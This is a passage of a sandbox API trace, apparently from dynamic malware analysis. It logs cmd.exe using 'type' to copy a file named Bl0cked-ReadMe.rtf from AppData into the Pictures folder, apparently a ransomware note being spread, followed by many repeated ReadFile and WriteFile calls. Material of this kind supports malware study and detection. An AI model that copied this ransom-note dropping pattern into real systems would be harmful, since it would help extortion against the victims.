1 [0146.073] GetEnvironmentStringsW () returned 0x1b2ad8* [0146.073] FreeEnvironmentStringsW (penv=0x1b2ad8) returned 1 [0146.073] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.074] GetConsoleOutputCP () returned 0x1b5 [0146.074] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.074] GetUserDefaultLCID () returned 0x409 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fa68, cchData=128 | out: lpLCData="0") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fa68, cchData=128 | out: lpLCData="0") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fa68, cchData=128 | out: lpLCData="1") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0146.075] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.076] GetConsoleTitleW (in: lpConsoleTitle=0x1a08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.076] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.076] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0146.077] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0146.077] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0146.077] _wcsicmp (_String1="type", _String2=")") returned 75 [0146.077] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0146.077] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0146.077] _wcsicmp (_String1="IF", _String2="type") returned -11 [0146.077] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0146.078] _wcsicmp (_String1="REM", _String2="type") returned -2 [0146.078] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0146.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.082] GetFileType (hFile=0x7) returned 0x2 [0146.275] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0146.275] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f960 | out: lpMode=0x16f960) returned 1 [0146.275] _dup (_FileHandle=1) returned 3 [0146.275] _close (_FileHandle=1) returned 0 [0146.275] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0146.275] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16f930, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0146.277] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0146.277] GetConsoleTitleW (in: lpConsoleTitle=0x16f760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.277] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0146.277] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0146.277] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0146.277] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0146.278] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.278] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x16f2c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f2c4) returned 0x1a0e50 [0146.278] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0146.278] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0146.278] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0146.279] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16e1d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0146.279] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0146.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.279] GetFileType (hFile=0x54) returned 0x1 [0146.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.279] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e228 | out: lpFileSizeHigh=0x16e228*=0x0) returned 0x1632 [0146.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.279] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.279] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.279] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.279] GetFileType (hFile=0x4c) returned 0x1 [0146.279] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.279] GetFileType (hFile=0x4c) returned 0x1 [0146.279] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.279] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.282] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] GetFileType (hFile=0x4c) returned 0x1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] GetFileType (hFile=0x4c) returned 0x1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] GetFileType (hFile=0x4c) returned 0x1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] GetFileType (hFile=0x4c) returned 0x1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] GetFileType (hFile=0x4c) returned 0x1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.283] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] GetFileType (hFile=0x4c) returned 0x1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] GetFileType (hFile=0x4c) returned 0x1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] GetFileType (hFile=0x4c) returned 0x1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] GetFileType (hFile=0x4c) returned 0x1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] GetFileType (hFile=0x4c) returned 0x1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.285] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.286] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.287] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, 